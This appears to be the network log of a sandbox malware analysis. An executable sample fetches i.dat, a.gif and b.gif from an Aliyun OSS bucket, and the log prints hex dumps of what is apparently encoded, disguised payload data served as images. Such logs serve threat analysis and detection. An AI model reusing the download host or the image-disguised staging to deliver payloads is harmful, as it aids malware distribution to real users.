                                    Jan 9, 2025 01:47:34.865700006 CET4435044559.110.190.44192.168.2.4
                                    Jan 9, 2025 01:47:34.865712881 CET4435044559.110.190.44192.168.2.4
                                    Jan 9, 2025 01:47:34.865722895 CET4435044559.110.190.44192.168.2.4
                                    Jan 9, 2025 01:47:34.865839005 CET50445443192.168.2.459.110.190.44
                                    Jan 9, 2025 01:47:34.865844965 CET4435044559.110.190.44192.168.2.4
                                    Jan 9, 2025 01:47:34.865859985 CET4435044559.110.190.44192.168.2.4
                                    Jan 9, 2025 01:47:34.865905046 CET50445443192.168.2.459.110.190.44
                                    Jan 9, 2025 01:47:34.865910053 CET4435044559.110.190.44192.168.2.4
                                    Jan 9, 2025 01:47:34.866009951 CET50445443192.168.2.459.110.190.44
                                    Jan 9, 2025 01:47:34.866014957 CET4435044559.110.190.44192.168.2.4
                                    Jan 9, 2025 01:47:34.866055012 CET50445443192.168.2.459.110.190.44
                                    Jan 9, 2025 01:47:34.866060019 CET4435044559.110.190.44192.168.2.4
                                    Jan 9, 2025 01:47:34.866099119 CET50445443192.168.2.459.110.190.44
                                    Jan 9, 2025 01:47:34.866128922 CET50445443192.168.2.459.110.190.44
                                    Jan 9, 2025 01:47:35.075342894 CET4435044559.110.190.44192.168.2.4
                                    Jan 9, 2025 01:47:35.075407028 CET50445443192.168.2.459.110.190.44
                                    Jan 9, 2025 01:47:35.245702982 CET50445443192.168.2.459.110.190.44
                                    Jan 9, 2025 01:47:35.245709896 CET4435044559.110.190.44192.168.2.4
                                    Jan 9, 2025 01:47:35.245778084 CET50445443192.168.2.459.110.190.44
                                    Jan 9, 2025 01:47:35.245843887 CET50445443192.168.2.459.110.190.44
                                    Jan 9, 2025 01:47:35.346802950 CET50445443192.168.2.459.110.190.44
                                    Jan 9, 2025 01:47:35.661781073 CET50445443192.168.2.459.110.190.44
                                    Jan 9, 2025 01:47:36.205794096 CET50445443192.168.2.459.110.190.44
                                    Jan 9, 2025 01:47:36.205805063 CET4435044559.110.190.44192.168.2.4
                                    Jan 9, 2025 01:47:36.395175934 CET50493443192.168.2.459.110.190.44
                                    Jan 9, 2025 01:47:36.395193100 CET4435049359.110.190.44192.168.2.4
                                    Jan 9, 2025 01:47:36.395255089 CET50493443192.168.2.459.110.190.44
                                    Jan 9, 2025 01:47:36.395442009 CET50493443192.168.2.459.110.190.44
                                    Jan 9, 2025 01:47:36.395454884 CET4435049359.110.190.44192.168.2.4
                                    Jan 9, 2025 01:47:37.663387060 CET4435049359.110.190.44192.168.2.4
                                    Jan 9, 2025 01:47:37.663469076 CET50493443192.168.2.459.110.190.44
                                    Jan 9, 2025 01:47:37.663908005 CET50493443192.168.2.459.110.190.44
                                    Jan 9, 2025 01:47:37.663921118 CET4435049359.110.190.44192.168.2.4
                                    Jan 9, 2025 01:47:37.664109945 CET50493443192.168.2.459.110.190.44
                                    Jan 9, 2025 01:47:37.664113998 CET4435049359.110.190.44192.168.2.4
                                    Jan 9, 2025 01:47:37.987653971 CET4435049359.110.190.44192.168.2.4
                                    Jan 9, 2025 01:47:37.987672091 CET4435049359.110.190.44192.168.2.4
                                    Jan 9, 2025 01:47:37.987723112 CET50493443192.168.2.459.110.190.44
                                    Jan 9, 2025 01:47:37.987731934 CET4435049359.110.190.44192.168.2.4
                                    Jan 9, 2025 01:47:37.987890959 CET50493443192.168.2.459.110.190.44
                                    Jan 9, 2025 01:47:37.987890959 CET50493443192.168.2.459.110.190.44
                                    Jan 9, 2025 01:47:37.988034964 CET4435049359.110.190.44192.168.2.4
                                    Jan 9, 2025 01:47:37.988089085 CET50493443192.168.2.459.110.190.44
                                    Jan 9, 2025 01:47:37.992326975 CET4435049359.110.190.44192.168.2.4
                                    Jan 9, 2025 01:47:37.992402077 CET50493443192.168.2.459.110.190.44
                                    Jan 9, 2025 01:47:37.994333982 CET4435049359.110.190.44192.168.2.4
                                    Jan 9, 2025 01:47:37.994390011 CET50493443192.168.2.459.110.190.44
                                    Jan 9, 2025 01:47:38.074449062 CET4435049359.110.190.44192.168.2.4
                                    Jan 9, 2025 01:47:38.074489117 CET4435049359.110.190.44192.168.2.4
                                    Jan 9, 2025 01:47:38.074501038 CET50493443192.168.2.459.110.190.44
                                    Jan 9, 2025 01:47:38.074512005 CET4435049359.110.190.44192.168.2.4
                                    Jan 9, 2025 01:47:38.074532986 CET50493443192.168.2.459.110.190.44
                                    Jan 9, 2025 01:47:38.074552059 CET50493443192.168.2.459.110.190.44
                                    Jan 9, 2025 01:47:38.075090885 CET4435049359.110.190.44192.168.2.4
                                    Jan 9, 2025 01:47:38.075143099 CET50493443192.168.2.459.110.190.44
                                    Jan 9, 2025 01:47:38.075146914 CET4435049359.110.190.44192.168.2.4
                                    Jan 9, 2025 01:47:38.075158119 CET4435049359.110.190.44192.168.2.4
                                    Jan 9, 2025 01:47:38.075191975 CET50493443192.168.2.459.110.190.44
                                    Jan 9, 2025 01:47:38.075326920 CET50493443192.168.2.459.110.190.44
                                    Jan 9, 2025 01:47:38.075334072 CET4435049359.110.190.44192.168.2.4
                                    Jan 9, 2025 01:47:38.089678049 CET50506443192.168.2.459.110.190.44
                                    Jan 9, 2025 01:47:38.089699984 CET4435050659.110.190.44192.168.2.4
                                    Jan 9, 2025 01:47:38.089764118 CET50506443192.168.2.459.110.190.44
                                    Jan 9, 2025 01:47:38.090060949 CET50506443192.168.2.459.110.190.44
                                    Jan 9, 2025 01:47:38.090070963 CET4435050659.110.190.44192.168.2.4
                                    Jan 9, 2025 01:47:39.292056084 CET4435050659.110.190.44192.168.2.4
                                    Jan 9, 2025 01:47:39.292387009 CET50506443192.168.2.459.110.190.44
                                    Jan 9, 2025 01:47:39.292618036 CET50506443192.168.2.459.110.190.44
                                    Jan 9, 2025 01:47:39.292625904 CET4435050659.110.190.44192.168.2.4
                                    Jan 9, 2025 01:47:39.292797089 CET50506443192.168.2.459.110.190.44
                                    Jan 9, 2025 01:47:39.292799950 CET4435050659.110.190.44192.168.2.4
                                    Jan 9, 2025 01:47:39.604542017 CET4435050659.110.190.44192.168.2.4
                                    Jan 9, 2025 01:47:39.604561090 CET4435050659.110.190.44192.168.2.4
                                    Jan 9, 2025 01:47:39.604593039 CET4435050659.110.190.44192.168.2.4
                                    Jan 9, 2025 01:47:39.604598999 CET50506443192.168.2.459.110.190.44
                                    Jan 9, 2025 01:47:39.604615927 CET4435050659.110.190.44192.168.2.4
                                    Jan 9, 2025 01:47:39.604636908 CET50506443192.168.2.459.110.190.44
                                    Jan 9, 2025 01:47:39.604643106 CET50506443192.168.2.459.110.190.44
                                    Jan 9, 2025 01:47:39.604660034 CET4435050659.110.190.44192.168.2.4
                                    Jan 9, 2025 01:47:39.604661942 CET50506443192.168.2.459.110.190.44
                                    Jan 9, 2025 01:47:39.604706049 CET50506443192.168.2.459.110.190.44
                                    Jan 9, 2025 01:47:39.605348110 CET50506443192.168.2.459.110.190.44
                                    Jan 9, 2025 01:47:39.605357885 CET4435050659.110.190.44192.168.2.4
                                    TimestampSource PortDest PortSource IPDest IP
                                    Jan 9, 2025 01:46:41.871579885 CET5362323162.159.36.2192.168.2.4
                                    Jan 9, 2025 01:46:42.352433920 CET53496641.1.1.1192.168.2.4
                                    Jan 9, 2025 01:47:20.358803988 CET5317253192.168.2.41.1.1.1
                                    Jan 9, 2025 01:47:20.410257101 CET53531721.1.1.1192.168.2.4
                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Jan 9, 2025 01:47:20.358803988 CET192.168.2.41.1.1.10xfc73Standard query (0)a8mw1y.oss-cn-beijing.aliyuncs.comA (IP address)IN (0x0001)false
                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Jan 9, 2025 01:47:20.410257101 CET1.1.1.1192.168.2.40xfc73No error (0)a8mw1y.oss-cn-beijing.aliyuncs.com59.110.190.44A (IP address)IN (0x0001)false
                                    • a8mw1y.oss-cn-beijing.aliyuncs.com
                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.45039159.110.190.444435956C:\Users\user\Desktop\2o63254452-763487230.06.exe
                                    TimestampBytes transferredDirectionData
                                    2025-01-09 00:47:21 UTC111OUTGET /i.dat HTTP/1.1
                                    User-Agent: GetData
                                    Host: a8mw1y.oss-cn-beijing.aliyuncs.com
                                    Cache-Control: no-cache
                                    2025-01-09 00:47:22 UTC557INHTTP/1.1 200 OK
                                    Server: AliyunOSS
                                    Date: Thu, 09 Jan 2025 00:47:21 GMT
                                    Content-Type: application/octet-stream
                                    Content-Length: 512
                                    Connection: close
                                    x-oss-request-id: 677F1C99A1523839399B2B74
                                    Accept-Ranges: bytes
                                    ETag: "C3BE870A726F627202B33B6AAD385CC2"
                                    Last-Modified: Wed, 08 Jan 2025 11:05:12 GMT
                                    x-oss-object-type: Normal
                                    x-oss-hash-crc64ecma: 253241388760715353
                                    x-oss-storage-class: Standard
                                    x-oss-ec: 0048-00000113
                                    Content-Disposition: attachment
                                    x-oss-force-download: true
                                    Content-MD5: w76HCnJvYnICsztqrThcwg==
                                    x-oss-server-time: 15
                                    2025-01-09 00:47:22 UTC512INData Raw: 07 1b 1b 1f 6c 25 30 30 51 08 5d 47 76 3e 69 28 5b 5b 05 4b 25 66 29 2e 47 44 47 40 27 6e 21 2c 45 55 59 42 21 31 6c 21 4e 4c 0e 40 6e 27 29 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 4e 52 52 56 25 6c 79 79 18 41 14 0e 3f 77 20 61 12 12 4c 02 6c 2f 60 67 0e 0d 0e 09 6e 27 68 65 0c 1c 10 0b 68 78 25 68 07 05 47 0a 24 6d 63 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 04 18 18 1c 6f 26 33 33 52 0b 5e 44 75 3d 6a 2b 58 58 06 48 26 65 2a 2d 44 47 44 43 24 6d 22 2f 46 56 5a 41 22 32 6f 22 4d 4f 0d 41 6f 26 28 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 27 4f 53 53 57 24 6d 78 78 19 40 15 0f 3e 76 21
                                    Data Ascii: l%00Q]Gv>i([[K%f).GDG@'n!,EUYB!1l!NL@n')&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&NRRV%lyyA?w aLl/`gn'hehx%hG$mclllllllllllllllllllllllllllllllllo&33R^Du=j+XXH&e*-DGDC$m"/FVZA"2o"MOAo&('''''''''''''''''''''''''''''''''OSSW$mxx@>v!


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    1192.168.2.45040359.110.190.444435956C:\Users\user\Desktop\2o63254452-763487230.06.exe
                                    TimestampBytes transferredDirectionData
                                    2025-01-09 00:47:23 UTC111OUTGET /a.gif HTTP/1.1
                                    User-Agent: GetData
                                    Host: a8mw1y.oss-cn-beijing.aliyuncs.com
                                    Cache-Control: no-cache
                                    2025-01-09 00:47:23 UTC546INHTTP/1.1 200 OK
                                    Server: AliyunOSS
                                    Date: Thu, 09 Jan 2025 00:47:23 GMT
                                    Content-Type: image/gif
                                    Content-Length: 135589
                                    Connection: close
                                    x-oss-request-id: 677F1C9B9F6B603639C81D8E
                                    Accept-Ranges: bytes
                                    ETag: "0DDD3F02B74B01D739C45956D8FD12B7"
                                    Last-Modified: Wed, 08 Jan 2025 11:04:16 GMT
                                    x-oss-object-type: Normal
                                    x-oss-hash-crc64ecma: 8642451798640735006
                                    x-oss-storage-class: Standard
                                    x-oss-ec: 0048-00000104
                                    Content-Disposition: attachment
                                    x-oss-force-download: true
                                    Content-MD5: Dd0/ArdLAdc5xFlW2P0Stw==
                                    x-oss-server-time: 25
                                    2025-01-09 00:47:23 UTC3550INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                    Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                                    2025-01-09 00:47:23 UTC4096INData Raw: 92 94 95 15 58 67 66 8f 0d ac 9c 9e d7 25 61 ea 28 7c d1 e2 ef 25 bc 8d ce ad ad e6 24 78 4e a7 6d 84 b4 b6 ff 3d 79 ce ae f0 30 fa 9b e0 89 4f 97 e0 f5 8e 4a c5 b1 9a ca cc 32 1e 44 28 99 59 18 2b c0 75 e7 d9 d9 59 24 df a8 d2 97 6d ad c6 d3 0c 89 da e7 e8 02 e8 d8 2c a5 6b 2f b8 7a 4e d7 b4 f7 f6 f7 b0 72 66 df ac ff fe ff 48 88 07 bd b1 04 06 08 8c db 0a 0b 0c 45 83 1a 91 41 13 13 5c 9e de e8 0d 61 2a 1a 1c 55 95 12 81 94 23 23 6c a8 33 5d 78 28 2a 63 a5 28 4d 9a 31 31 cd 26 69 05 37 37 70 b2 37 bd 89 3c 3e 77 cd 54 35 13 45 45 0e ce 4d 39 ff 4a 4c b2 5b 0d 60 50 52 1b df 58 3d e2 59 59 12 d6 49 39 0e 5e 60 29 eb 66 89 d1 67 67 97 7c 4d 5b 6d 6d 26 e4 7d 21 c7 72 74 3d fb 62 21 29 7b 7b 34 f4 7b 65 35 80 82 7c 91 89 b6 86 88 c1 01 86 b9 38 8f 8f d8 1c
                                    Data Ascii: Xgf%a(|%$xNm=y0OJ2D(Y+uY$m,k/zNrfHEA\a*U##l3]x(*c(M11&i77p7<>wT5EEM9JL[`PRX=YYI9^`)fgg|M[mm&}!rt=b!){{4{e5|8
                                    2025-01-09 00:47:23 UTC4096INData Raw: 6c 81 49 b6 96 98 1c 6c ee db d5 13 d3 84 f1 5d b6 e1 84 a7 a7 2b 69 ab e7 cf 4d e3 ac 54 4e a7 ed 94 b4 b6 fa 33 7d f2 30 74 8e 6c 40 d5 d9 e2 c2 c4 8d 43 07 80 42 22 bf df 85 43 9b f4 81 9f 58 10 9d 5d 1f 30 41 ec db dc 91 55 32 ac 68 89 d3 6f e0 e9 41 e9 e9 a2 66 e1 81 4b ee f0 ca 0c 7a b7 c9 f9 b8 06 06 ef 75 dc fc fe b7 8b 0c 95 97 05 05 4a 8c a4 2d 7a 03 0c 0d 42 84 b4 35 6a 1b 14 15 5e 94 e1 e6 52 90 b0 39 86 17 20 21 57 69 6c ae 23 a5 8d 28 2a 67 a7 20 5d 8a 31 31 7e b8 31 61 93 36 38 b2 2f 4d 99 3c 3e 86 41 41 42 43 08 cc 32 63 60 01 c3 0f 68 6d b1 5a 51 f4 53 53 1c de 5b 15 cc 58 5a de 9c d6 ae 16 6f 29 ad e6 a4 2d ef 6a 59 fd 6b 6b 14 73 22 e2 3c 55 4e 36 47 b5 cc f9 6b 79 7a 33 bb 39 5a 5f 84 81 82 83 7b 90 cd 22 89 89 01 7b c4 00 83 45 34 90
                                    Data Ascii: lIl]+iMTN3}0tl@CB"CX]0AU2hoAfKzuJ-zB5j^R9 !Wil#(*g ]11~1a68/M<>AABC2c`hmZQSS[XZo)-jYkks"<UN6Gkyz39Z_{"{E4
                                    2025-01-09 00:47:23 UTC4096INData Raw: 75 9b 94 96 df 13 d5 be cb 63 88 7d 90 a1 a1 ea 2e a9 c1 30 a6 a8 56 bf 6d bc ac ae 2a 4f c9 af 32 4f 3f a5 b7 b8 cd af 3a 47 36 ad bf c0 b5 cf 8b 4f 10 7f c7 cc c9 ca 23 79 3b 31 30 5b 16 9a 58 68 f1 76 d7 d8 d9 92 58 18 bd 9f 82 a1 bd bc be bf 26 2a 2b 24 25 26 27 20 21 22 23 3c 3d 3e 3f 38 bd 7f ab dc e9 b2 72 90 d9 e6 a8 48 82 ee 33 8f c4 4f 8c d0 41 81 f1 8f e5 0a 84 f9 1e 96 c1 14 15 16 94 e0 18 15 9f b1 1d 1e 1f 68 ac 2f 15 b1 24 26 6f a1 5d 0e 6b d3 38 75 3f 31 31 7a b8 39 51 b2 36 38 71 b9 c2 c3 48 6b 73 cb 4c 1d d6 45 45 0a cc 4d 09 df 4a 4c c6 5b 2d c5 50 52 1b d9 50 15 d3 59 59 e3 5a 5c 5d 5e 17 e9 25 46 4b 2c ee 63 25 fd 68 6a 23 e5 29 4a 4f 8f 64 ad e7 75 75 3e fc 75 59 fe 7a 7c f6 8e 37 03 49 7d 06 72 cd 89 cf 40 0c 7c c3 05 80 85 0b 91 91
                                    Data Ascii: uc}.0Vm*O2O?:G6O#y;10[XhvX&*+$%&' !"#<=>?8rH3OAh/$&o]k8u?11z9Q68qHksLEEMJL[-PRPYYZ\]^%FK,c%hj#)JOduu>uYz|7I}r@|
                                    2025-01-09 00:47:23 UTC4096INData Raw: b7 ac d4 2f 87 98 99 9a d3 17 d5 96 ac 72 e9 2b ff 80 8d ee 2e e4 8d 96 e3 27 e1 8a 9f 77 f5 96 8b b5 b5 b6 b7 7f fd 9e ff be bd be bf 88 48 9e e7 e4 3a d3 4d 37 c9 ca 4e 0c b8 c8 30 c5 d1 d2 d2 d4 9d 5d 9b fc e9 25 ce c1 dd df df 27 e4 4d 65 e5 e5 e7 e7 e8 e9 d9 22 04 89 21 10 0f b9 7f fe 91 70 f7 f7 07 ec 75 fb fd fd b6 7c 3d 96 76 02 04 fa 4a 8a 05 31 fb f4 f3 41 87 02 81 94 13 13 d3 10 81 92 19 19 19 3b 1c 1d 56 96 3d 49 a7 22 24 6d af 3a a9 ac 2b 2b 59 16 6b 1c f0 79 bf 36 51 41 37 37 82 3a 1a 3b 3c 75 b7 7b 64 69 03 ce 0c 44 0e ce 14 6d 6a b4 59 49 cb 4e 50 19 d9 46 11 21 57 57 11 da 92 a4 d9 9d 17 50 28 b1 2a ea 71 51 12 66 68 21 e7 66 81 e9 6f 6f 8f 64 8d 8c 74 75 9e bd 90 86 85 33 f1 31 5a 2f b3 53 c3 3b 98 84 86 87 60 a1 ee 8b 8c c5 03 c3 b4 c1
                                    Data Ascii: /r+.'wH:M7N0]%'Me"!pu|=vJ1A;V=I"$m:++Yky6QA77:;<u{diDmjYINPF!WWP(*qQfh!foodtu31Z/S;`
                                    2025-01-09 00:47:23 UTC4096INData Raw: b7 d4 16 36 5f 98 99 9a 66 24 62 61 60 df e9 29 d7 80 cd ee 24 6c f9 f5 68 e4 28 58 db 05 f9 39 f7 90 85 fe 3e e4 9d da 38 c4 a9 be ca 84 a7 a4 a5 54 ca 71 d8 ae 4a 31 8a be c7 a8 4c 2b 8b a5 d7 b2 56 15 f7 d7 6e dc bd e1 9c de ad ea 87 df b9 e4 92 e2 81 ed c9 ea a3 6f 2a ec a7 73 37 f0 95 71 2e 82 b6 9e c2 22 8f 34 16 c4 99 66 91 64 65 94 0a b1 08 40 84 5e 2f 3c e5 dd 26 10 11 1d a4 1a 5d 9b 43 3c 29 7c 90 c4 55 9d d8 22 c9 9d 0a 24 25 6e a4 ee 2b 4c ae f7 59 2b 49 0b e9 46 e2 78 be 6a 13 78 36 8d f3 33 8a fd 77 cb 1d 66 23 6f 84 c6 3b 6c 01 4a 3f 44 0c cd ec 98 51 52 53 a9 1d dd 23 7c 31 12 d8 98 0d 01 9c ac ad ae af a8 2d e5 8b 50 ea 57 ae 06 6c 6e 6f 3c fa bb 7c f1 f7 76 77 78 31 ff b2 09 50 96 5d ad 81 82 c6 b7 4c c3 b4 48 ba 58 b8 45 c5 49 cb b4 b1
                                    Data Ascii: 6_f$ba`)$lh(X9>8TqJ1L+Vno*s7q."4fde@^/<&]C<)|U"$%n+LY+IFxjx63wf#o;lJ?DQRS#|1-PWlno<|vwx1P]LHXEI
                                    2025-01-09 00:47:23 UTC4096INData Raw: ce d5 c9 c9 c9 c5 5a 56 57 50 51 52 53 6c 6d 6e 6f 68 e5 f5 ef 2b 45 9a e3 29 64 e6 24 69 be 36 d4 b5 b5 b6 ff 3d 6b b5 3f e2 bc be bf 85 f2 10 8e 41 05 8a 4c 11 bd e2 8a c3 7a ce a9 55 11 a6 cc 95 6f d4 d7 d8 d9 93 e0 0e d2 58 25 e0 e1 e2 af 69 bc e4 81 61 e8 8c aa 2b ee d4 ef bd f2 28 be 71 3c 82 ad 9e b8 79 c2 fc 89 ad 99 66 91 64 65 94 4c 85 c5 09 45 31 d9 03 8e c5 0f 10 11 53 1c a3 14 5f 94 d9 1b 53 98 df 1f 78 5e a9 62 dc 45 65 a6 1f 27 5d f2 6b 24 9b 6c d0 49 0d 1e 32 47 29 53 0b 6b 38 4d 2d 72 bf ff 3f 73 7b 93 4d c0 d1 45 46 47 2e 08 8d 48 10 4d 07 cc 93 53 1a d8 18 71 36 1f dd 90 2e 73 3a de 67 5f 14 43 04 05 f4 2c e5 a5 69 25 51 b9 1f 02 61 d8 71 39 f1 b2 76 3c f5 b4 7a 1f 3b f2 3f 83 18 fc b9 81 f7 62 cc 0e ca a3 e0 c1 0f 42 f8 cb 81 38 91 f7
                                    Data Ascii: ZVWPQRSlmnoh+E)d$i6=k?ALzUoX%ia+(q<yfdeLE1S_Sx^bEe']k$lI2G)Sk8M-r?s{MEFG.HMSq6.s:g_C,i%Qaq9v<z;?bB8
                                    2025-01-09 00:47:23 UTC4096INData Raw: db 17 55 b6 de 1b 71 9b ee 4c d5 15 1d f8 a0 a2 a3 54 26 26 c7 a9 a9 aa aa 6f 61 62 63 7c 7d 7e 7f 78 fd 33 7e b7 3d 2c bb bc bd 4e 3c c1 3e 8a 48 45 d5 c7 c7 c8 81 4f 0b b8 c9 3e 4c d0 2e 9a 58 55 f5 d7 d7 d8 91 5f 1b a8 d9 2e 5c e0 1e aa 68 65 fd e7 e7 e8 a1 6f 2b 98 e9 1e 6c f0 0e ba 78 75 c5 f7 f7 f8 b1 7f 3b 88 f9 0e 7c 00 fe 4a 8e 45 5d 47 bf 0e 09 0a 0b 40 80 03 fd 24 10 12 75 84 59 2f 5f e8 6d 16 53 97 0d 56 9a f2 55 26 d3 a7 27 d9 6f ab 51 d2 2b 58 20 66 a4 60 39 7a b6 e6 41 32 c7 bb 3b c5 73 bf fd 1e 76 c3 a9 43 36 94 0d cd c6 10 48 4a 4b bc ce ce 2f 51 51 52 ac 1c de 97 94 94 95 96 97 90 91 92 93 ac ad ae af a8 25 35 2f eb 85 4a 23 e9 bf 26 e4 aa 05 37 3b f1 bc 02 37 34 f2 6b 37 47 af 0a 50 c8 08 93 cb 0f 4f 6e 0d 76 76 75 c6 09 5f fa 90 d9 1a
                                    Data Ascii: UqLT&&oabc|}~x3~=,N<>HEO>L.XU_.\heo+lxu;|JE]G@$uY/_mSVU&'oQ+X f`9zA2;svC6HJK/QQR%5/J#&7;74k7GPOnvvu_
                                    2025-01-09 00:47:24 UTC4096INData Raw: 56 1f 5a 7e 3d d3 99 9a d3 17 d6 8e 14 50 ae 14 e7 80 95 2e a6 41 2a aa ab ac e5 25 db 94 f1 31 7a 94 36 7e 48 31 f2 a2 f3 37 e1 9a f7 88 42 06 e3 9b 06 45 38 37 bd e9 48 33 33 ba d1 98 5a 15 9b 5f 1a 9e 5a cd d1 82 da dc 5e 3e c0 a8 20 1b e6 ac 8e 26 bf a0 ea ee 21 07 ea a6 62 f5 71 d8 f2 f4 03 b6 ff d8 8d e9 c8 2e 76 31 bb 8d 43 00 eb d9 44 06 07 40 8a f2 f4 78 2b 46 84 5b 01 98 57 30 25 9e 16 f3 0f a7 1a 1c 1d 1e 57 ad 75 06 13 af ea 62 ac ed c1 3d 60 2c 2d a5 df 0b c4 46 3a b7 7e 2e 17 bb f1 c5 d0 39 32 88 7b 64 71 0a c8 28 61 7e 0f c3 3d 6e 0b 04 c6 12 6b 18 19 d1 97 74 0a 95 9b 94 95 96 97 90 91 92 93 ac ad ae af a8 2d ef 3b 4c 79 3c 23 ef 81 0e 22 f5 b8 3f f8 a5 3c fd 87 30 f2 a0 37 f7 a4 0b 50 68 a1 7f 7c 7b c0 b5 4e cd ba 4a 4c 8c 9b 8e 8f 90 a2
                                    Data Ascii: VZ~=P.A*%1z6~H17BE87H33Z_Z^> &!bq.v1CD@x+F[W0%Wub=`,-F:~.92{dq(a~=nkt-;Ly<#"?<07Ph|{NJL
                                    2025-01-09 00:47:24 UTC4096INData Raw: 65 57 94 e2 9f d0 12 55 73 09 58 61 60 e8 2a 65 eb 2f f9 82 97 e0 2a 6e 8b f3 6e 62 63 7c 7d 7e 7f 78 f9 3b f6 a9 f1 39 79 ad f1 95 7d a6 51 a4 a5 54 ca 70 cd 8a c6 7c cf ce e6 06 ba d8 99 51 11 d5 50 16 a2 34 5c 13 d4 48 1d 1d 13 2c 2d 2e 2f 28 ad 6f ea 01 c2 eb eb 2f 21 22 23 3c 3d 3e 3f 38 b5 a5 bf 7b 15 da b3 77 24 b6 74 0d d1 29 02 04 ed 1d e4 f7 f6 42 8e cc 79 1a 47 9b da ed c3 91 d5 62 1c a0 18 1a 1b 1c 55 9d db 00 7a e1 10 e4 6d a5 e3 08 72 e9 e7 e0 e1 e2 e3 fc fd fe ff f8 75 65 7f bb d5 1a 73 bf c4 de 77 cb 98 4d c4 df 45 46 47 00 c0 3e 6f 7c 05 cb 86 ee 50 52 53 54 1d 59 12 a9 11 d3 27 78 65 38 39 f0 07 04 05 f4 2d ed 6a d9 59 6b 6b 24 e8 a7 1a 50 99 7d 77 74 75 cf 69 78 79 7a 93 b9 7c 7e 7f 39 7e 82 83 84 6d 4d 74 77 76 c2 00 81 01 be 8e 90 dd
                                    Data Ascii: eWUsXa`*e/*nnbc|}~x;9y}QTp|QP4\H,-./(o/!"#<=>?8{w$t)ByGbUzmrueswMEFG>o|PRSTY'xe89-jYkk$P}wtuixyz|~9~mMtwv


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    2192.168.2.45041959.110.190.444435956C:\Users\user\Desktop\2o63254452-763487230.06.exe
                                    TimestampBytes transferredDirectionData
                                    2025-01-09 00:47:25 UTC111OUTGET /b.gif HTTP/1.1
                                    User-Agent: GetData
                                    Host: a8mw1y.oss-cn-beijing.aliyuncs.com
                                    Cache-Control: no-cache
                                    2025-01-09 00:47:25 UTC547INHTTP/1.1 200 OK
                                    Server: AliyunOSS
                                    Date: Thu, 09 Jan 2025 00:47:25 GMT
                                    Content-Type: image/gif
                                    Content-Length: 125333
                                    Connection: close
                                    x-oss-request-id: 677F1C9DB258223730AA9265
                                    Accept-Ranges: bytes
                                    ETag: "2CA9F4AB0970AA58989D66D9458F8701"
                                    Last-Modified: Wed, 08 Jan 2025 11:04:16 GMT
                                    x-oss-object-type: Normal
                                    x-oss-hash-crc64ecma: 10333201072197591521
                                    x-oss-storage-class: Standard
                                    x-oss-ec: 0048-00000104
                                    Content-Disposition: attachment
                                    x-oss-force-download: true
                                    Content-MD5: LKn0qwlwqliYnWbZRY+HAQ==
                                    x-oss-server-time: 29
                                    2025-01-09 00:47:25 UTC3549INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                                    Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
